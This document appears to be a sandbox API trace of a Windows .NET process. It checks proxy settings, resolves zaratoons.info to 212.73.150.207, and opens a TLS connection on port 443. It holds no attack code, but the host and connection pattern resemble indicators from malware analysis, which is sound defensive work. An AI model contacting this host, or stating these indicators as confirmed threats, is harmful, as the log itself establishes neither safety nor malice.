	[0901.696] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fcb680, cbSid=0x1c73d500 | out: pSid=0x2fcb680*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d500) returned 1
	[0901.696] CreateMutexW (lpMutexAttributes=0x2fcb838, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.696] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0901.696] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0901.998] ReleaseMutex (hMutex=0x3f0) returned 1
	[0902.011] CloseHandle (hObject=0x3f0) returned 1
	[0902.011] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fcc4b8, cbSid=0x1c73d500 | out: pSid=0x2fcc4b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d500) returned 1
	[0902.011] CreateMutexW (lpMutexAttributes=0x2fcc670, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.011] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0902.011] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0902.087] ReleaseMutex (hMutex=0x3f0) returned 1
	[0902.087] CloseHandle (hObject=0x3f0) returned 1
	[0902.088] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fcd300, cbSid=0x1c73d500 | out: pSid=0x2fcd300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d500) returned 1
	[0902.088] CreateMutexW (lpMutexAttributes=0x2fcd4b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.088] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0902.088] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0902.111] ReleaseMutex (hMutex=0x3f0) returned 1
	[0902.111] CloseHandle (hObject=0x3f0) returned 1
	[0902.111] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fce140, cbSid=0x1c73d500 | out: pSid=0x2fce140*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d500) returned 1
	[0902.111] CreateMutexW (lpMutexAttributes=0x2fce2f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.111] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0902.111] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0902.127] ReleaseMutex (hMutex=0x3f0) returned 1
	[0902.127] CloseHandle (hObject=0x3f0) returned 1
	[0902.130] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3f0
	[0902.130] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3fc
	[0902.131] ioctlsocket (in: s=0x3f0, cmd=-2147195266, argp=0x1c73db38 | out: argp=0x1c73db38) returned 0
	[0902.131] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x404
	[0902.131] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x408
	[0902.131] ioctlsocket (in: s=0x404, cmd=-2147195266, argp=0x1c73db38 | out: argp=0x1c73db38) returned 0
	[0902.132] WSAIoctl (in: s=0x3f0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c73dab0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c73dab0, lpOverlapped=0x0) returned -1
	[0902.133] CoTaskMemAlloc (cb=0x204) returned 0x2c79d0
	[0902.133] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2c79d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.134] CoTaskMemFree (pv=0x2c79d0) 
	[0902.134] WSAEventSelect (s=0x3f0, hEventObject=0x3fc, lNetworkEvents=512) returned 0
	[0902.134] WSAIoctl (in: s=0x404, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c73dab0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c73dab0, lpOverlapped=0x0) returned -1
	[0902.134] CoTaskMemAlloc (cb=0x204) returned 0x2c79d0
	[0902.134] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2c79d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.134] CoTaskMemFree (pv=0x2c79d0) 
	[0902.134] WSAEventSelect (s=0x404, hEventObject=0x408, lNetworkEvents=512) returned 0
	[0902.135] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x40c
	[0902.135] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x40c, param_3=0x3) returned 0x0
	[0902.182] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c73dbf0 | out: phkResult=0x1c73dbf0*=0x424) returned 0x0
	[0902.184] RegOpenKeyExW (in: hKey=0x424, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c73dad8 | out: phkResult=0x1c73dad8*=0x428) returned 0x0
	[0902.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x42c
	[0902.184] RegNotifyChangeKeyValue (hKey=0x428, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x42c, fAsynchronous=1) returned 0x0
	[0902.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c73db00 | out: phkResult=0x1c73db00*=0x430) returned 0x0
	[0902.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x434
	[0902.185] RegNotifyChangeKeyValue (hKey=0x430, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x434, fAsynchronous=1) returned 0x0
	[0902.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c73db00 | out: phkResult=0x1c73db00*=0x438) returned 0x0
	[0902.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x43c
	[0902.186] RegNotifyChangeKeyValue (hKey=0x438, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x43c, fAsynchronous=1) returned 0x0
	[0902.186] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.186] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73da68 | out: TokenHandle=0x1c73da68*=0x440) returned 1
	[0902.192] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.192] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d238 | out: TokenHandle=0x1c73d238*=0x444) returned 1
	[0902.197] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.197] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d238 | out: TokenHandle=0x1c73d238*=0x448) returned 1
	[0902.207] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c73db38 | out: pProxyConfig=0x1c73db38) returned 1
	[0904.380] SetEvent (hEvent=0x358) returned 1
	[0905.030] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.030] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d2a8 | out: TokenHandle=0x1c73d2a8*=0x498) returned 1
	[0905.034] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.034] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d2a8 | out: TokenHandle=0x1c73d2a8*=0x49c) returned 1
	[0905.035] SetEvent (hEvent=0x358) returned 1
	[0905.501] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c73d778 | out: pFixedInfo=0x0, pOutBufLen=0x1c73d778) returned 0x6f
	[0905.753] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b847020
	[0905.753] GetNetworkParams (in: pFixedInfo=0x1b847020, pOutBufLen=0x1c73d778 | out: pFixedInfo=0x1b847020, pOutBufLen=0x1c73d778) returned 0x0
	[0905.843] CoTaskMemAlloc (cb=0xd) returned 0x1b83ed00
	[0905.843] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0905.843] CoTaskMemFree (pv=0x1b83ed00) 
	[0905.846] LocalFree (hMem=0x1b847020) returned 0x0
	[0905.861] CoTaskMemAlloc (cb=0x10) returned 0x1b83ed00
	[0905.862] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c73d720*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c73d718 | out: ppResult=0x1c73d718*=0x1b84eb10*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b83ed60*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0907.437] CoTaskMemFree (pv=0x1b83ed00) 
	[0907.437] CoTaskMemFree (pv=0x0) 
	[0907.438] FreeAddrInfoW (pAddrInfo=0x1b84eb10*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b83ed60*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0907.440] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c0
	[0907.440] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b8
	[0907.440] ioctlsocket (in: s=0x4c0, cmd=-2147195266, argp=0x1c73d738 | out: argp=0x1c73d738) returned 0
	[0907.440] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0907.440] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4cc
	[0907.440] ioctlsocket (in: s=0x4c8, cmd=-2147195266, argp=0x1c73d738 | out: argp=0x1c73d738) returned 0
	[0907.440] WSAIoctl (in: s=0x4c0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c73d6b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c73d6b0, lpOverlapped=0x0) returned -1
	[0907.440] CoTaskMemAlloc (cb=0x204) returned 0x2c79d0
	[0907.440] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2c79d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.440] CoTaskMemFree (pv=0x2c79d0) 
	[0907.440] WSAEventSelect (s=0x4c0, hEventObject=0x4b8, lNetworkEvents=512) returned 0
	[0907.440] WSAIoctl (in: s=0x4c8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c73d6b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c73d6b0, lpOverlapped=0x0) returned -1
	[0907.441] CoTaskMemAlloc (cb=0x204) returned 0x2c79d0
	[0907.441] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2c79d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.441] CoTaskMemFree (pv=0x2c79d0) 
	[0907.441] WSAEventSelect (s=0x4c8, hEventObject=0x4cc, lNetworkEvents=512) returned 0
	[0907.442] GetAdaptersAddresses () returned 0x6f
	[0907.600] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b856130
	[0907.600] GetAdaptersAddresses () returned 0x0
	[0907.633] LocalFree (hMem=0x1b856130) returned 0x0
	[0907.636] WSAConnect (in: s=0x4b0, name=0x2fd9c88*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0907.768] closesocket (s=0x4ac) returned 0
	[0907.970] EnumerateSecurityPackagesW (in: pcPackages=0x1c73d598, ppPackageInfo=0x1c73d590 | out: pcPackages=0x1c73d598, ppPackageInfo=0x1c73d590) returned 0x0
	[0907.973] lstrlenW (lpString="Negotiate") returned 9
	[0907.974] CoTaskMemAlloc (cb=0x16) returned 0x1b83ed40
	[0907.974] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0b90, Length=0x14 | out: Destination=0x1b83ed40) 
	[0907.974] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.974] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0907.974] CoTaskMemAlloc (cb=0x3c) returned 0x2d8960
	[0907.974] RtlMoveMemory (in: Destination=0x2d8960, Source=0x2a0ba4, Length=0x3a | out: Destination=0x2d8960) 
	[0907.974] CoTaskMemFree (pv=0x2d8960) 
	[0907.974] lstrlenW (lpString="NegoExtender") returned 12
	[0907.974] CoTaskMemAlloc (cb=0x1c) returned 0x1b8446d0
	[0907.974] RtlMoveMemory (in: Destination=0x1b8446d0, Source=0x2a0bde, Length=0x1a | out: Destination=0x1b8446d0) 
	[0907.974] CoTaskMemFree (pv=0x1b8446d0) 
	[0907.974] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0907.974] CoTaskMemAlloc (cb=0x3e) returned 0x2d8960
	[0907.974] RtlMoveMemory (in: Destination=0x2d8960, Source=0x2a0bf8, Length=0x3c | out: Destination=0x2d8960) 
	[0907.974] CoTaskMemFree (pv=0x2d8960) 
	[0907.974] lstrlenW (lpString="Kerberos") returned 8
	[0907.974] CoTaskMemAlloc (cb=0x14) returned 0x1b83ed40
	[0907.974] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0c34, Length=0x12 | out: Destination=0x1b83ed40) 
	[0907.974] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.974] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0907.974] CoTaskMemAlloc (cb=0x32) returned 0x1b84eb90
	[0907.974] RtlMoveMemory (in: Destination=0x1b84eb90, Source=0x2a0c46, Length=0x30 | out: Destination=0x1b84eb90) 
	[0907.975] CoTaskMemFree (pv=0x1b84eb90) 
	[0907.975] lstrlenW (lpString="NTLM") returned 4
	[0907.975] CoTaskMemAlloc (cb=0xc) returned 0x1b83ed40
	[0907.975] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0c76, Length=0xa | out: Destination=0x1b83ed40) 
	[0907.975] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.975] lstrlenW (lpString="NTLM Security Package") returned 21
	[0907.975] CoTaskMemAlloc (cb=0x2e) returned 0x1b84eb90
	[0907.975] RtlMoveMemory (in: Destination=0x1b84eb90, Source=0x2a0c80, Length=0x2c | out: Destination=0x1b84eb90) 
	[0907.975] CoTaskMemFree (pv=0x1b84eb90) 
	[0907.975] lstrlenW (lpString="Schannel") returned 8
	[0907.975] CoTaskMemAlloc (cb=0x14) returned 0x1b83ed40
	[0907.975] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0cac, Length=0x12 | out: Destination=0x1b83ed40) 
	[0907.975] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.975] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.975] CoTaskMemAlloc (cb=0x36) returned 0x1b84eb90
	[0907.975] RtlMoveMemory (in: Destination=0x1b84eb90, Source=0x2a0cbe, Length=0x34 | out: Destination=0x1b84eb90) 
	[0907.975] CoTaskMemFree (pv=0x1b84eb90) 
	[0907.975] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0907.975] CoTaskMemAlloc (cb=0x5c) returned 0x1b832b60
	[0907.975] RtlMoveMemory (in: Destination=0x1b832b60, Source=0x2a0cf2, Length=0x5a | out: Destination=0x1b832b60) 
	[0907.975] CoTaskMemFree (pv=0x1b832b60) 
	[0907.975] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.975] CoTaskMemAlloc (cb=0x36) returned 0x1b84eb90
	[0907.975] RtlMoveMemory (in: Destination=0x1b84eb90, Source=0x2a0d4c, Length=0x34 | out: Destination=0x1b84eb90) 
	[0907.975] CoTaskMemFree (pv=0x1b84eb90) 
	[0907.975] lstrlenW (lpString="WDigest") returned 7
	[0907.975] CoTaskMemAlloc (cb=0x12) returned 0x1b83ed40
	[0907.975] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0d80, Length=0x10 | out: Destination=0x1b83ed40) 
	[0907.975] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.975] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0907.975] CoTaskMemAlloc (cb=0x46) returned 0x2d8960
	[0907.975] RtlMoveMemory (in: Destination=0x2d8960, Source=0x2a0d90, Length=0x44 | out: Destination=0x2d8960) 
	[0907.976] CoTaskMemFree (pv=0x2d8960) 
	[0907.976] lstrlenW (lpString="TSSSP") returned 5
	[0907.976] CoTaskMemAlloc (cb=0xe) returned 0x1b83ed40
	[0907.976] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0dd4, Length=0xc | out: Destination=0x1b83ed40) 
	[0907.976] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.976] lstrlenW (lpString="TS Service Security Package") returned 27
	[0907.976] CoTaskMemAlloc (cb=0x3a) returned 0x2d8960
	[0907.976] RtlMoveMemory (in: Destination=0x2d8960, Source=0x2a0de0, Length=0x38 | out: Destination=0x2d8960) 
	[0907.976] CoTaskMemFree (pv=0x2d8960) 
	[0907.976] lstrlenW (lpString="pku2u") returned 5
	[0907.976] CoTaskMemAlloc (cb=0xe) returned 0x1b83ed40
	[0907.976] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0e18, Length=0xc | out: Destination=0x1b83ed40) 
	[0907.976] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.976] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0907.976] CoTaskMemAlloc (cb=0x30) returned 0x1b84eb90
	[0907.976] RtlMoveMemory (in: Destination=0x1b84eb90, Source=0x2a0e24, Length=0x2e | out: Destination=0x1b84eb90) 
	[0907.976] CoTaskMemFree (pv=0x1b84eb90) 
	[0907.976] lstrlenW (lpString="CREDSSP") returned 7
	[0907.976] CoTaskMemAlloc (cb=0x12) returned 0x1b83ed40
	[0907.976] RtlMoveMemory (in: Destination=0x1b83ed40, Source=0x2a0e52, Length=0x10 | out: Destination=0x1b83ed40) 
	[0907.976] CoTaskMemFree (pv=0x1b83ed40) 
	[0907.976] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0907.976] CoTaskMemAlloc (cb=0x4a) returned 0x1b852030
	[0907.976] RtlMoveMemory (in: Destination=0x1b852030, Source=0x2a0e62, Length=0x48 | out: Destination=0x1b852030) 
	[0907.976] CoTaskMemFree (pv=0x1b852030) 
	[0907.977] FreeContextBuffer (in: pvContextBuffer=0x2a0a50 | out: pvContextBuffer=0x2a0a50) returned 0x0
	[0907.983] GetCurrentProcess () returned 0xffffffffffffffff
	[0907.983] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d078 | out: TokenHandle=0x1c73d078*=0x4ac) returned 1
	[0907.987] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2fdde40, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c73cf88, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c73cf78, ptsExpiry=0x1c73cf70 | out: phCredential=0x1c73cf78, ptsExpiry=0x1c73cf70) returned 0x0
	[0908.047] InitializeSecurityContextW (in: phCredential=0x1c73d180, phContext=0x0, pTargetName=0x2fd28a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c73d170, pOutput=0x2fe0588, pfContextAttr=0x1c73d168, ptsExpiry=0x1c73d160 | out: phNewContext=0x1c73d170, pOutput=0x2fe0588, pfContextAttr=0x1c73d168, ptsExpiry=0x1c73d160) returned 0x90312
	[0908.990] FreeContextBuffer (in: pvContextBuffer=0x2b1b30 | out: pvContextBuffer=0x2b1b30) returned 0x0
	[0908.997] send (s=0x4b0, buf=0x2fe0658*, len=118, flags=0) returned 118
	[0908.998] recv (in: s=0x4b0, buf=0x2fe0658, len=5, flags=0 | out: buf=0x2fe0658*) returned 5
	[0909.172] recv (in: s=0x4b0, buf=0x2fe065d, len=93, flags=0 | out: buf=0x2fe065d*) returned 93
	[0909.173] InitializeSecurityContextW (in: phCredential=0x1c73d0a0, phContext=0x1c73d350, pTargetName=0x2fd28a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fe0968, Reserved2=0x0, phNewContext=0x1c73d090, pOutput=0x2fe0988, pfContextAttr=0x1c73d088, ptsExpiry=0x1c73d080 | out: phNewContext=0x1c73d090, pOutput=0x2fe0988, pfContextAttr=0x1c73d088, ptsExpiry=0x1c73d080) returned 0x90312
	[0909.178] recv (in: s=0x4b0, buf=0x2fe0a78, len=5, flags=0 | out: buf=0x2fe0a78*) returned 5
	[0909.178] recv (in: s=0x4b0, buf=0x2fe0a9d, len=2556, flags=0 | out: buf=0x2fe0a9d*) returned 2556
	[0909.178] InitializeSecurityContextW (in: phCredential=0x1c73cfd0, phContext=0x1c73d280, pTargetName=0x2fd28a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fe1570, Reserved2=0x0, phNewContext=0x1c73cfc0, pOutput=0x2fe1590, pfContextAttr=0x1c73cfb8, ptsExpiry=0x1c73cfb0 | out: phNewContext=0x1c73cfc0, pOutput=0x2fe1590, pfContextAttr=0x1c73cfb8, ptsExpiry=0x1c73cfb0) returned 0x90312
	[0909.179] recv (in: s=0x4b0, buf=0x2fe1680, len=5, flags=0 | out: buf=0x2fe1680*) returned 5
	[0909.180] recv (in: s=0x4b0, buf=0x2fe16a5, len=331, flags=0 | out: buf=0x2fe16a5*) returned 331
	[0909.180] InitializeSecurityContextW (in: phCredential=0x1c73cf00, phContext=0x1c73d1b0, pTargetName=0x2fd28a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fe18c0, Reserved2=0x0, phNewContext=0x1c73cef0, pOutput=0x2fe18e0, pfContextAttr=0x1c73cee8, ptsExpiry=0x1c73cee0 | out: phNewContext=0x1c73cef0, pOutput=0x2fe18e0, pfContextAttr=0x1c73cee8, ptsExpiry=0x1c73cee0) returned 0x90312
	[0909.188] recv (in: s=0x4b0, buf=0x2fe19d0, len=5, flags=0 | out: buf=0x2fe19d0*) returned 5
	[0909.188] recv (in: s=0x4b0, buf=0x2fe19f5, len=4, flags=0 | out: buf=0x2fe19f5*) returned 4
	[0909.188] InitializeSecurityContextW (in: phCredential=0x1c73ce30, phContext=0x1c73d0e0, pTargetName=0x2fd28a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fe1ad0, Reserved2=0x0, phNewContext=0x1c73ce20, pOutput=0x2fe1af0, pfContextAttr=0x1c73ce18, ptsExpiry=0x1c73ce10 | out: phNewContext=0x1c73ce20, pOutput=0x2fe1af0, pfContextAttr=0x1c73ce18, ptsExpiry=0x1c73ce10) returned 0x90312
	[0909.200] FreeContextBuffer (in: pvContextBuffer=0x2d5560 | out: pvContextBuffer=0x2d5560) returned 0x0
	[0909.200] send (s=0x4b0, buf=0x2fe1bc0*, len=134, flags=0) returned 134
	[0909.200] recv (in: s=0x4b0, buf=0x2fe1bc0, len=5, flags=0 | out: buf=0x2fe1bc0*) returned 5
	[0909.312] recv (in: s=0x4b0, buf=0x2fe1bc5, len=1, flags=0 | out: buf=0x2fe1bc5*) returned 1
	[0909.312] InitializeSecurityContextW (in: phCredential=0x1c73cd60, phContext=0x1c73d010, pTargetName=0x2fd28a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fe1d38, Reserved2=0x0, phNewContext=0x1c73cd50, pOutput=0x2fe1d58, pfContextAttr=0x1c73cd48, ptsExpiry=0x1c73cd40 | out: phNewContext=0x1c73cd50, pOutput=0x2fe1d58, pfContextAttr=0x1c73cd48, ptsExpiry=0x1c73cd40) returned 0x90312
	[0909.314] recv (in: s=0x4b0, buf=0x2fe1e48, len=5, flags=0 | out: buf=0x2fe1e48*) returned 5
	[0909.314] recv (in: s=0x4b0, buf=0x2fe1e6d, len=48, flags=0 | out: buf=0x2fe1e6d*) returned 48
	[0909.314] InitializeSecurityContextW (in: phCredential=0x1c73cc90, phContext=0x1c73cf40, pTargetName=0x2fd28a8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fe1f70, Reserved2=0x0, phNewContext=0x1c73cc80, pOutput=0x2fe1f90, pfContextAttr=0x1c73cc78, ptsExpiry=0x1c73cc70 | out: phNewContext=0x1c73cc80, pOutput=0x2fe1f90, pfContextAttr=0x1c73cc78, ptsExpiry=0x1c73cc70) returned 0x0
	[0909.633] QueryContextAttributesW (in: phContext=0x1c73cef0, ulAttribute=0x4, pBuffer=0x2fe20a8 | out: pBuffer=0x2fe20a8) returned 0x0
	[0909.634] QueryContextAttributesW (in: phContext=0x1c73cef0, ulAttribute=0x5a, pBuffer=0x2fe2128 | out: pBuffer=0x2fe2128) returned 0x0
	[0909.641] QueryContextAttributesW (in: phContext=0x1c73cda0, ulAttribute=0x53, pBuffer=0x2fe2478 | out: pBuffer=0x2fe2478) returned 0x0
	[0909.647] CertDuplicateCRLContext (pCrlContext=0x1b839a00) returned 0x1b839a00
	[0909.650] CertDuplicateStore (hCertStore=0x1b7fdd80) returned 0x1b7fdd80
	[0909.651] CertEnumCertificatesInStore (hCertStore=0x1b7fdd80, pPrevCertContext=0x0) returned 0x1b839a80
	[0909.651] CertDuplicateCRLContext (pCrlContext=0x1b839a80) returned 0x1b839a80
	[0909.652] CertEnumCertificatesInStore (hCertStore=0x1b7fdd80, pPrevCertContext=0x1b839a80) returned 0x1b839a00
	[0909.652] CertDuplicateCRLContext (pCrlContext=0x1b839a00) returned 0x1b839a00
	[0909.652] CertEnumCertificatesInStore (hCertStore=0x1b7fdd80, pPrevCertContext=0x1b839a00) returned 0x0
	[0909.652] CertCloseStore (hCertStore=0x1b7fdd80, dwFlags=0x0) returned 1
	[0909.652] CertFreeCRLContext (pCrlContext=0x1b839a00) returned 1
	[0909.658] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b7fdcb0
	[0909.659] CertAddCRLLinkToStore (in: hCertStore=0x1b7fdcb0, pCrlContext=0x1b839a80, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.659] CertAddCRLLinkToStore (in: hCertStore=0x1b7fdcb0, pCrlContext=0x1b839a00, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.661] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b839a00, pTime=0x1c73cda8, hAdditionalStore=0x1b7fdcb0, pChainPara=0x1c73cdb0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c73cda0 | out: ppChainContext=0x1c73cda0) returned 1
